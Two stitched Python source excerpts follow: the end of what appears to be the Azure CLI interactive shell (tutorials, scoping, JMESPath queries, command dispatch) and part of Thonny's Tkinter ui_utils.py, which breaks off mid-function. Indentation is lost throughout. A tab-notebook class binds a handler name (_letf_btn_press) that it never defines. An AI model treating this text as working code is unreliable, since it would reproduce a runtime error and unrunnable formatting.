self.cli.current_buffer.reset(
initial_document=Document(
self.description_docs,
cursor_position=position))
self.cli.request_redraw()
def set_scope(self, value):
""" narrows the scopes the commands """
if self.default_command:
self.default_command += ' ' + value
else:
self.default_command += value
return value
def handle_example(self, text, continue_flag):
""" parses for the tutorial """
cmd = text.partition(SELECT_SYMBOL['example'])[0].rstrip()
num = text.partition(SELECT_SYMBOL['example'])[2].strip()
example = ""
try:
num = int(num) - 1
except ValueError:
print("An Integer should follow the colon", file=self.output)
return ""
if cmd in self.completer.command_examples:
if num >= 0 and num < len(self.completer.command_examples[cmd]):
example = self.completer.command_examples[cmd][num][1]
example = example.replace('\n', '')
else:
print('Invalid example number', file=self.output)
return '', True
example = example.replace('az', '')
starting_index = None
counter = 0
example_no_fill = ""
flag_fill = True
for word in example.split():
if flag_fill:
example_no_fill += word + " "
if word.startswith('-'):
example_no_fill += word + " "
if not starting_index:
starting_index = counter
flag_fill = False
counter += 1
return self.example_repl(example_no_fill, example, starting_index, continue_flag)
def example_repl(self, text, example, start_index, continue_flag):
""" REPL for interactive tutorials """
if start_index:
start_index = start_index + 1
cmd = ' '.join(text.split()[:start_index])
example_cli = CommandLineInterface(
application=self.create_application(
full_layout=False),
eventloop=create_eventloop())
example_cli.buffers['example_line'].reset(
initial_document=Document(u'{}\n'.format(
add_new_lines(example)))
)
while start_index < len(text.split()):
if self.default_command:
cmd = cmd.replace(self.default_command + ' ', '')
example_cli.buffers[DEFAULT_BUFFER].reset(
initial_document=Document(
u'{}'.format(cmd),
cursor_position=len(cmd)))
example_cli.request_redraw()
answer = example_cli.run()
if not answer:
return "", True
answer = answer.text
if answer.strip('\n') == cmd.strip('\n'):
continue
else:
if len(answer.split()) > 1:
start_index += 1
cmd += " " + answer.split()[-1] + " " +\
u' '.join(text.split()[start_index:start_index + 1])
example_cli.exit()
del example_cli
else:
cmd = text
return cmd, continue_flag
# pylint: disable=too-many-statements
def _special_cases(self, cmd, outside):
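""" handles shell gestures (exit, clear-history, scoping, outside commands, queries, examples) before the command is sent to the CLI """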
break_flag = False
continue_flag = False
args = parse_quotes(cmd)
cmd_stripped = cmd.strip()
if not cmd_stripped and cmd:
# add scope if there are only spaces
cmd = self.default_command + " " + cmd
elif cmd_stripped in ("quit", "exit"):
break_flag = True
elif cmd_stripped == "clear-history":
continue_flag = True
self.reset_history()
elif cmd_stripped == CLEAR_WORD:
outside = True
cmd = CLEAR_WORD
elif cmd_stripped[0] == SELECT_SYMBOL['outside']:
cmd = cmd_stripped[1:]
outside = True
if cmd.strip() and cmd.split()[0] == 'cd':
self.handle_cd(parse_quotes(cmd))
continue_flag = True
telemetry.track_outside_gesture()
elif cmd_stripped[0] == SELECT_SYMBOL['exit_code']:
meaning = "Success" if self.last_exit == 0 else "Failure"
print(meaning + ": " + str(self.last_exit), file=self.output)
continue_flag = True
telemetry.track_exit_code_gesture()
elif SELECT_SYMBOL['query'] in cmd_stripped and self.last and self.last.result:
continue_flag = self.handle_jmespath_query(args)
telemetry.track_query_gesture()
elif not args:
continue_flag = True
elif args[0] == '--version' or args[0] == '-v':
try:
continue_flag = True
self.cli_ctx.show_version()
except SystemExit:
pass
elif SELECT_SYMBOL['example'] in cmd:
cmd, continue_flag = self.handle_example(cmd, continue_flag)
telemetry.track_ran_tutorial()
elif SELECT_SYMBOL['scope'] == cmd_stripped[0:2]:
continue_flag, cmd = self.handle_scoping_input(continue_flag, cmd, cmd_stripped)
telemetry.track_scope_changes()
else:
# not a special character; add scope and remove 'az'
if self.default_command:
cmd = self.default_command + " " + cmd
elif cmd.split(' ', 1)[0].lower() == 'az':
cmd = ' '.join(cmd.split()[1:])
if "|" in cmd or ">" in cmd:
# anything I don't parse, send off
outside = True
cmd = "az " + cmd
telemetry.track_cli_commands_used()
return break_flag, continue_flag, outside, cmd
def handle_jmespath_query(self, args):
""" handles the jmespath query for injection or printing """
continue_flag = False
query_symbol = SELECT_SYMBOL['query']
symbol_len = len(query_symbol)
try:
if len(args) == 1:
# if arguments start with query_symbol, just print query result
if args[0] == query_symbol:
result = self.last.result
elif args[0].startswith(query_symbol):
result = jmespath.search(args[0][symbol_len:], self.last.result)
print(json.dumps(result, sort_keys=True, indent=2), file=self.output)
elif args[0].startswith(query_symbol):
# print error message, user unsure of query shortcut usage
print(("Usage Error: " + os.linesep +
"1. Use {0} stand-alone to display previous result with optional filtering "
"(Ex: {0}[jmespath query])" +
os.linesep + "OR:" + os.linesep +
"2. Use {0} to query the previous result for argument values "
"(Ex: group show --name {0}[jmespath query])").format(query_symbol), file=self.output)
else:
# query, inject into cmd
def jmespath_query(match):
if match.group(0) == query_symbol:
return str(self.last.result)
query_result = jmespath.search(match.group(0)[symbol_len:], self.last.result)
return str(query_result)
def sub_result(arg):
escaped_symbol = re.escape(query_symbol)
# regex captures query symbol and all characters following it in the argument
return json.dumps(re.sub(r'%s.*' % escaped_symbol, jmespath_query, arg))
cmd_base = ' '.join(map(sub_result, args))
self.cli_execute(cmd_base)
continue_flag = True
except (jmespath.exceptions.ParseError, CLIError) as e:
print("Invalid Query Input: " + str(e), file=self.output)
continue_flag = True
return continue_flag
def handle_scoping_input(self, continue_flag, cmd, text):
""" handles what to do with a scoping gesture """
default_split = text.partition(SELECT_SYMBOL['scope'])[2].split()
cmd = cmd.replace(SELECT_SYMBOL['scope'], '')
continue_flag = True
if not default_split:
self.default_command = ""
print('unscoping all', file=self.output)
return continue_flag, cmd
while default_split:
if not text:
value = ''
else:
value = default_split[0]
tree_path = self.default_command.split()
tree_path.append(value)
if self.completer.command_tree.in_tree(tree_path):
self.set_scope(value)
print("defaulting: " + value, file=self.output)
cmd = cmd.replace(SELECT_SYMBOL['scope'], '')
elif SELECT_SYMBOL['unscope'] == default_split[0] and self.default_command.split():
value = self.default_command.split()[-1]
self.default_command = ' ' + ' '.join(self.default_command.split()[:-1])
if not self.default_command.strip():
self.default_command = self.default_command.strip()
print('unscoping: ' + value, file=self.output)
elif SELECT_SYMBOL['unscope'] not in text:
print("Scope must be a valid command", file=self.output)
default_split = default_split[1:]
return continue_flag, cmd
def reset_history(self):
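""" deletes the history file and starts over with a fresh, empty history """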
history_file_path = os.path.join(self.config.get_config_dir(), self.config.get_history())
os.remove(history_file_path)
self.history = FileHistory(history_file_path)
self.cli.buffers[DEFAULT_BUFFER].history = self.history
def cli_execute(self, cmd):
""" sends the command to the CLI to be executed """
try:
args = parse_quotes(cmd)
if args and args[0] == 'feedback':
self.config.set_feedback('yes')
self.user_feedback = False
azure_folder = get_config_dir()
if not os.path.exists(azure_folder):
os.makedirs(azure_folder)
ACCOUNT.load(os.path.join(azure_folder, 'azureProfile.json'))
CONFIG.load(os.path.join(azure_folder, 'az.json'))
SESSION.load(os.path.join(azure_folder, 'az.sess'), max_age=3600)
invocation = self.cli_ctx.invocation_cls(cli_ctx=self.cli_ctx,
parser_cls=self.cli_ctx.parser_cls,
commands_loader_cls=self.cli_ctx.commands_loader_cls,
help_cls=self.cli_ctx.help_cls)
if '--progress' in args:
args.remove('--progress')
execute_args = [args]
thread = Thread(target=invocation.execute, args=execute_args)
thread.daemon = True
thread.start()
self.threads.append(thread)
self.curr_thread = thread
progress_args = [self]
thread = Thread(target=progress_view, args=progress_args)
thread.daemon = True
thread.start()
self.threads.append(thread)
result = None
else:
result = invocation.execute(args)
self.last_exit = 0
if result and result.result is not None:
if self.output:
self.output.write(result)
self.output.flush()
else:
formatter = self.cli_ctx.output.get_formatter(self.cli_ctx.invocation.data['output'])
self.cli_ctx.output.out(result, formatter=formatter, out_file=sys.stdout)
self.last = result
except Exception as ex: # pylint: disable=broad-except
self.last_exit = handle_exception(ex)
except SystemExit as ex:
self.last_exit = int(ex.code)
def progress_patch(self, _=False):
""" forces to use the Shell Progress """
from .progress import ShellProgressView
self.cli_ctx.progress_controller.init_progress(ShellProgressView())
return self.cli_ctx.progress_controller
def run(self):
""" starts the REPL """
from .progress import ShellProgressView
self.cli_ctx.get_progress_controller().init_progress(ShellProgressView())
self.cli_ctx.get_progress_controller = self.progress_patch
self.command_table_thread = LoadCommandTableThread(self.restart_completer, self)
self.command_table_thread.start()
from .configuration import SHELL_HELP
self.cli.buffers['symbols'].reset(
initial_document=Document(u'{}'.format(SHELL_HELP)))
# flush telemetry for new commands and send successful interactive mode entry event
telemetry.set_success()
telemetry.flush()
while True:
try:
document = self.cli.run(reset_current_buffer=True)
text = document.text
if not text:
# not input
self.set_prompt()
continue
cmd = text
outside = False
except AttributeError:
# when the user pressed Control D
break
except (KeyboardInterrupt, ValueError):
# CTRL C
self.set_prompt()
continue
else:
self.history.append(text)
b_flag, c_flag, outside, cmd = self._special_cases(cmd, outside)
if b_flag:
break
if c_flag:
self.set_prompt()
continue
self.set_prompt()
if outside:
subprocess.Popen(cmd, shell=True).communicate()
else:
telemetry.start()
self.cli_execute(cmd)
if self.last_exit and self.last_exit != 0:
telemetry.set_failure()
else:
telemetry.set_success()
telemetry.flush()
telemetry.conclude()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
from logging import getLogger
import os
import platform
import re
import subprocess
import sys
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from _tkinter import TclError
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.languages import get_button_padding, tr
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.tktextext import TweakableText
PARENS_REGEX = re.compile(r"[\(\)\{\}\[\]]")
logger = getLogger(__name__)
class CommonDialog(tk.Toplevel):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self.bind("<FocusIn>", self._unlock_on_focus_in, True)
def _unlock_on_focus_in(self, event):
if not self.winfo_ismapped():
focussed_widget = self.focus_get()
self.deiconify()
if focussed_widget:
focussed_widget.focus_set()
def get_padding(self):
return ems_to_pixels(2)
def get_internal_padding(self):
return self.get_padding() // 4
class CommonDialogEx(CommonDialog):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
# Need to fill the dialog with a frame to gain theme support
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.bind("<Escape>", self.on_close, True)
self.protocol("WM_DELETE_WINDOW", self.on_close)
def on_close(self, event=None):
self.destroy()
class QueryDialog(CommonDialogEx):
def __init__(
self,
master,
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
):
super().__init__(master)
self.var = tk.StringVar(value=initial_value)
self.result = None
margin = self.get_padding()
spacing = margin // 2
self.title(title)
self.prompt_label = ttk.Label(self.main_frame, text=prompt)
self.prompt_label.grid(row=1, column=1, columnspan=2, padx=margin, pady=(margin, spacing))
if options:
self.entry_widget = ttk.Combobox(
self.main_frame, textvariable=self.var, values=options, height=15, width=entry_width
)
else:
self.entry_widget = ttk.Entry(self.main_frame, textvariable=self.var, width=entry_width)
self.entry_widget.bind("<Return>", self.on_ok, True)
self.entry_widget.bind("<KP_Enter>", self.on_ok, True)
self.entry_widget.grid(
row=3, column=1, columnspan=2, sticky="we", padx=margin, pady=(0, margin)
)
self.ok_button = ttk.Button(
self.main_frame, text=tr("OK"), command=self.on_ok, default="active"
)
self.ok_button.grid(row=5, column=1, padx=(margin, spacing), pady=(0, margin), sticky="e")
self.cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self.on_cancel)
self.cancel_button.grid(row=5, column=2, padx=(0, margin), pady=(0, margin), sticky="e")
self.main_frame.columnconfigure(1, weight=1)
self.entry_widget.focus_set()
def on_ok(self, event=None):
self.result = self.var.get()
self.destroy()
def on_cancel(self, event=None):
self.result = None
self.destroy()
def get_result(self) -> Optional[str]:
return self.result
def ask_string(
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
master=None,
):
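""" show a modal QueryDialog and return the entered string, or None if the dialog was cancelled """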
dlg = QueryDialog(
master, title, prompt, initial_value=initial_value, options=options, entry_width=entry_width
)
show_dialog(dlg, master)
return dlg.get_result()
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key values.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, border=0, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
leftover_size = self._get_size() - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", ems_to_pixels(0.6)))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
menu.add_command(label=tr("Close"), command=self._close_tab_from_menu)
menu.add_command(label=tr("Close others"), command=self._close_other_tabs)
menu.add_command(label=tr("Close all"), command=self.close_tabs)
return menu
def _left_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logger.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remembers its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().in_simple_mode():
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
show_statusbar=False,
borderwidth=0,
relief="flat",
**tree_kw,
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(
row=0, column=1, sticky=tk.NSEW, rowspan=2 if show_statusbar else 1
)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw,
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
self.error_label = ttk.Label(self.tree)
if show_statusbar:
self.statusbar = ttk.Frame(self)
self.statusbar.grid(row=1, column=0, sticky="nswe")
else:
self.statusbar = None
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def show_error(self, error_text):
self.error_label.configure(text=error_text)
self.error_label.grid()
def clear_error(self):
self.error_label.grid_remove()
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>").replace("Key-", "").replace("KeyPress-", "").replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
if len(parts[-1]) == 1 and parts[-1].isupper() and not "Shift" in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
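# Illustrative translations produced by sequence_to_accelerator:
#   "<Control-o>"       -> "Ctrl+O"
#   "<Control-Shift-s>" -> "Ctrl+Shift+S"
#   "<Control-S>"       -> "Ctrl+Shift+S"   (capital letter implies Shift)
#   "F5"                -> "F5"             (non-bracketed sequences pass through unchanged)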
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def __init__(self, master=None, style="Text", tag_current_line=False, cnf={}, **kw):
super().__init__(
master=master, style=style, tag_current_line=tag_current_line, cnf=cnf, **kw
)
self._last_event_changed_line_count = False
def direct_insert(self, index, chars, tags=None, **kw):
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
line_before = self.get(concrete_index + " linestart", concrete_index + " lineend")
self._last_event_changed_line_count = "\n" in chars
result = tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
line_after = self.get(concrete_index + " linestart", concrete_index + " lineend")
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextInsert",
index=concrete_index,
text=chars,
tags=tags,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
return result
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
chars = self.get(index1, index2)
self._last_event_changed_line_count = "\n" in chars
line_before = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
finally:
line_after = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextDelete",
index1=concrete_index1,
index2=concrete_index2,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
def _is_trivial_edit(self, chars, line_before, line_after):
# line is taken after edit for insertion and before edit for deletion
if not chars.strip():
# linebreaks, including with automatic indent
# check it doesn't break a triple-quote
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
elif len(chars) > 1:
# paste, cut, load or something like this
trivial_for_coloring = False
trivial_for_parens = False
elif chars == "#":
trivial_for_coloring = "''''" not in line_before and '"""' not in line_before
trivial_for_parens = trivial_for_coloring and not re.search(PARENS_REGEX, line_before)
elif chars in "()[]{}":
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = False
elif chars == "'":
trivial_for_coloring = "'''" not in line_before and "'''" not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == '"':
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == "\\":
